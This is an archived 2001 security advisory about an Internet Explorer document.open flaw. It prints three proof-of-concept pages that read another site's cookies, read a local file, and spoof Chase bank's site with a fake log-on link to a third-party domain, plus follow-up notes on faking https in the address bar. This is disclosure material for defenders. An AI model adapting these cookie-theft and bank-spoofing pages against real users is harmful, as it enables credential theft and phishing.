Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Browsers :: expl4944.htm

Internet Explorer document.open method allows access to local files and cookies



20th Dec 2001 [SBWID-4944]
COMMAND

	IE document.open method allows access to local files and cookies

SYSTEMS AFFECTED

	 Tested on :

	 IE 6.0.2600.0000 + Windows 2000 Update Versions:Q312461,Q240308,Q313675

	 IE 5.5 SP2

	 IE 5.50.4807.2300

PROBLEM

	the Pull published [http://www.osioniusx.com] :
	

	By  simply  using  the  document.open   method   and   not   using   the
	document.close method you are able to: steal cookies; read  local  files
	that are parsable by IE(mime type text/html  to  be  exact);  and  spoof
	sites.
	

	Exploits on : http://www.osioniusx.com
	

	\"cookieStealing.html\" - This opens Yahoo.com and steals the cookie.
	

	<html>

	<head>

	<title>Cookie Stealing</title>

	</head>

	<body>

	<P>This page shows how this bug can be used to steal cookies. For this example 

	  I use yahoo.com and a five second timeout (wait five seconds after the window 

	  opens). Cookie stealing can result in impersonation, stealing of Credit Card 

	  numbers, etc. 

	  <script>

	var y = document.open( \"http://www.yahoo.com\", \"x\", \"width=400,height=400,status = yes, location = yes,resizable = yes, toolbar=yes\" );

	setTimeout(\'alert(y.document.cookie);y.close();\',5000);

	</script>

	</P>

	</html>

	

	

	\"FileReading.html\" - This opens up C:\\test.txt and then reads it.
	

	<html>

	<head>

	<title>File Reading</title>

	</head>

	<body>

	This page shows local file reading with this bug. The file being read is c:\\test.txt. 

	This could be used to gather various types of passwords, and other local information you do not

	want malicious, remote users to have.

	<script>

	var y = document.open( \"c:/test.txt\", \"x\", \"width=400,height=400,status = yes, location = yes,resizable = yes, toolbar=yes\" );

	setTimeout(\'alert(y.document.body.innerHTML);y.close();\',1000);

	</script>

	</html>

	

	

	\"SiteSpoofing.html\" - This spoofs www.chase.com  --  chase.com  is  in
	the url, the title, and there is a link on the page to log  on  to  your
	account which comes back to www.osioniusx.com.
	

	<html>

	<head>

	<title>Web Site Spoofing</title>

	</head>

	<body>

	<script>

	s=\'<title>Chase</title>Chase Bank content could go here <br><br><a href=http://www.osioniusx.com/>LogOn To Your Bank Account</a>\';

	

	var y = document.open( \"http://www.chase.com\", \"x\", \"status = yes, location = yes,resizable = yes, toolbar=yes, directories=yes,menubar=yes\" );

	setTimeout(\'y.document.write(s);\',500);

	</script>

	</html>

	

	

	Update by Rogan Dawes :
	

	if you use an \"https://\" URL, it also shows THAT in the location bar.
	

	Naturally, there are no  SSL  indicators  (padlock,  Secure  properties,
	etc).
	

	For the paranoid among us (i.e. you have the alerts turned on), IE  DOES
	warn that you are entering and then LEAVING a secure  session,  but  the
	fact remains that the Location field shows \"https://\"
	

	It doesn\'t seem to work for documents containing frames, however.
	

	And you can get the logo to stop spinning by  doing  the  document.close
	inside the timeout call. (If you look at the source of the spoofed  page
	demo, you\'ll see what I mean.)
	

	 Update

	 ======

	

	Jelmer posted recently a similar exploit and \"the Pull\" added :
	

	Jelmer\'s:
	

	\"        extDoc =

	document.open(\'file:///C:/jelmer.txt\',\'jelmer\',\'height=200,width=400,status=no,toolbar=no,menubar=no,location=no\');\" 

	

	mine:
	 var y = document.open( \"c:/test.txt\", \"x\",

	\"width=400,height=400,status = yes, location =

	yes,resizable = yes, toolbar=yes\" ); 

	

	It doesn\'t matter if it is  \"cmd  =

	\'extDoc.execScript(\"alert(document.body.innerText)\",

	\"Jscript\");\';\" that is able to read the code or this:

	setTimeout(\'alert(y.document.body.innerHTML);y.document.close();\',1000); 

	-- they are just the same thing.
	

	(ref: http://www.osioniusx.com document.write()) bug.

	

	Basically, the problem  is  that  when  the  document.write()  uses  the
	window.open() method as described on the msdn  website  for  the  method
	here:
	

	http://msdn.microsoft.com/workshop/author/dhtml/reference/methods/open_1.asp

	

SOLUTION

	None yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH